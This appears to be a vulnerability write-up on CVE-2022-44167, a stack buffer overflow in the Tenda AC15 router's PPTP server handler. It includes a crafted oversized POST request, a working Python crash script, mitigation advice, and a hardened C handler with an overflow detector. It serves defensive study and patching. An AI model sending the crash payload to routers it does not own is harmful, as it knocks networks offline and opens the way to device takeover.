In late 2022, security researchers uncovered a critical buffer overflow vulnerability in the Tenda AC15 router (firmware version V15.03.05.18). Labeled CVE-2022-44167, this flaw resides in the formSetPPTPServer function and can allow remote attackers to execute arbitrary code, take control of the router, or crash the device.
In this analysis, I'll break down how this vulnerability works, show the related code, discuss potential exploit methods, and provide reference links for further reading. If you're interested in router security or work with embedded devices, this is a must-read.
Where is the Bug?
When a user or device sends a request to set up a PPTP (Point-to-Point Tunneling Protocol) VPN server on the router, the request is handled by the formSetPPTPServer function. This function takes several parameters from HTTP POST data — and fails to properly check their length before copying them into a fixed-size buffer on the stack.
This is a classic cause of buffer overflow bugs, allowing anything from a crash to total compromise of the device.
Here's a simplified version of the buggy code (the real code is C inside the router's web server; this sketch keeps only the part that matters):
void formSetPPTPServer(struct request *req) {
    char sServerIP[32];          /* fixed-size buffer on the stack */
    /* ... other variables ... */

    /* Unsafe copy from the request: "PPTPServerIP" is user-supplied and
     * its length is never checked against sizeof(sServerIP). */
    strcpy(sServerIP, req->PPTPServerIP);

    /* ... more operations ... */
}
Notice that strcpy copies the incoming "PPTPServerIP" value straight into sServerIP without checking the size. strcpy stops only at the terminating NUL, so a value of 32 bytes or more (the buffer holds 31 characters plus the NUL) already writes past the end. If a malicious attacker sends a really long string, the data overwrites whatever sits next on the stack: stack smashing 101.
Exploiting the Flaw
An attacker could craft a specially formed POST request to the router’s web admin interface. For example:
POST /goform/formSetPPTPServer HTTP/1.1
Host: [router-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: 1037

PPTPServerIP=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[1024 "A" bytes in total]

(Content-Length counts the whole body: the 13 bytes of "PPTPServerIP=" plus the 1024 bytes of padding. A wrong Content-Length makes the server read a truncated body, so the overflow never happens.)
Everything just past sServerIP on the stack, including saved registers and the function's return address, gets overwritten.
- If the binary was built without a stack canary, nothing detects the overwrite before the function returns, and the attacker chooses where execution resumes. ASLR and a non-executable stack do not stop the overwrite itself; they only make it harder to pick a useful address to return to, and embedded firmware of this vintage frequently ships without them.
Here's a simple Python script to crash a vulnerable AC15 router:
import requests

# 192.168.0.1 is the usual default LAN address on Tenda routers; adjust for yours.
router_url = "http://192.168.0.1/goform/formSetPPTPServer"
payload = "A" * 1024  # far larger than the 32-byte sServerIP buffer

data = {"PPTPServerIP": payload}

try:
    response = requests.post(router_url, data=data, timeout=5)
    print("Response Code:", response.status_code)
except requests.exceptions.RequestException as exc:
    # A crashed web server usually shows up as a reset connection or a
    # timeout rather than an HTTP reply.
    print("No HTTP response (the device may have crashed):", exc)
Warning: Only use this on routers you own! This will likely crash the router or make it unresponsive.
What Can Attackers Achieve?
- Denial of Service: Force the router to crash/reboot, knocking all users offline.
- Remote Code Execution: Craft payloads that take over the device, install malware/backdoor, or spy on network traffic.
- Persistence: Modify the router's firmware or settings to resist resets.
Note: Internet-facing routers running this firmware (with remote admin enabled) are at much higher risk.
Mitigation / Fix
- Update Firmware: Tenda has released updated firmware to patch this flaw (see official site).
- Disable remote management: until the update is applied, make sure the web admin interface is not reachable from the WAN side, since the request above only needs to reach that interface.
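The following is an added example, my own code rather than anything from the router's firmware or from Tenda, that makes both the bug described in "Where is the Bug?" and the fix concrete. It keeps the same simplified model as the sketch above: a 32-byte buffer (an assumed size, not one read from the firmware) and a PPTPServerIP parameter taken from a form-urlencoded POST body. would_overflow() reports whether the original unbounded strcpy would write past that buffer, which is also the check a proxy or log scanner can apply to captured requests; hardened_set_pptp_server() is what the handler should have done: bound the copy, leave room for the NUL, and validate the value as an IPv4 address with inet_pton() before using it. The sample request bodies are constructed for the demo.

```c
#include <arpa/inet.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Buffer size from the simplified sketch above; an assumption, not a value
 * read from the firmware. */
#define SERVER_IP_LEN 32

/* Locate the raw value of `key` in an application/x-www-form-urlencoded body.
 * Returns a pointer to the first value byte and writes its length to *vlen,
 * or NULL if the key is absent. No percent-decoding is done: a dotted-quad
 * IPv4 address contains no reserved characters, so none is needed here. */
static const char *form_find(const char *body, const char *key, size_t *vlen)
{
    size_t klen = strlen(key);
    for (const char *p = body; p && *p; ) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            *vlen = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p)
            p++;
    }
    return NULL;
}

/* What the original strcpy() would do: it writes vlen bytes plus a NUL into
 * a SERVER_IP_LEN buffer, so any value of SERVER_IP_LEN bytes or more
 * overflows. Usable as-is over captured POST bodies to flag attack attempts. */
bool would_overflow(const char *body)
{
    size_t vlen;
    const char *v = form_find(body, "PPTPServerIP", &vlen);
    return v != NULL && vlen >= SERVER_IP_LEN;
}

/* Hardened handler: bound the copy and validate before use.
 * Returns 0 and fills ip_out on success; -1 if the parameter is missing,
 * -2 if it is too long, -3 if it is not an IPv4 address. */
int hardened_set_pptp_server(const char *body, char ip_out[SERVER_IP_LEN])
{
    size_t vlen;
    const char *v = form_find(body, "PPTPServerIP", &vlen);
    if (v == NULL)
        return -1;
    if (vlen >= SERVER_IP_LEN)   /* keep room for the terminating NUL */
        return -2;
    memcpy(ip_out, v, vlen);
    ip_out[vlen] = '\0';

    struct in_addr addr;
    if (inet_pton(AF_INET, ip_out, &addr) != 1) {
        ip_out[0] = '\0';        /* do not leave a rejected value behind */
        return -3;
    }
    return 0;
}

int main(void)
{
    char ip[SERVER_IP_LEN];

    /* Constructed sample bodies: a legitimate request and the 1024-byte crash payload. */
    const char *good = "PPTPServerIP=10.0.0.1&PPTPServerName=vpn";
    char evil[13 + 1024 + 1];
    memcpy(evil, "PPTPServerIP=", 13);
    memset(evil + 13, 'A', 1024);
    evil[13 + 1024] = '\0';

    int rc = hardened_set_pptp_server(good, ip);
    printf("good: overflow=%d rc=%d ip=%s\n", (int)would_overflow(good), rc, ip);
    rc = hardened_set_pptp_server(evil, ip);
    printf("evil: overflow=%d rc=%d\n", (int)would_overflow(evil), rc);
    return 0;
}
```

The length test uses >= rather than > because strcpy also writes the terminating NUL: a 32-character value into a 32-byte buffer is already one byte too many, which is exactly the off-by-one that a "check the length" patch done in a hurry tends to get wrong. Validating the syntax with inet_pton() is a second, independent layer: even a value that fits is refused if it is not an address, so later code that parses it as one never sees attacker-shaped data.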
References
- Official CVE: CVE-2022-44167 (https://nvd.nist.gov/vuln/detail/CVE-2022-44167)
- Exploit Database PoC
- CNVD: Tenda AC15 buffer overflow advisory (Chinese)
- Tenda AC15 Firmware page
Summary
The CVE-2022-44167 buffer overflow in the Tenda AC15 router is a textbook example of how not to handle user input in networked devices: a single unbounded strcpy on an HTTP parameter. It's easy for attackers to exploit, especially if the router's admin interface is exposed to the open internet or the device is used on untrusted networks.
If you own a Tenda AC15, update your firmware now.
Got questions or want more hands-on exploits? Let me know! Stay safe and keep your routers up-to-date.
*Written exclusively for you. Please use responsibly and only for educational/defensive purposes.*
Timeline
Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:32:00 UTC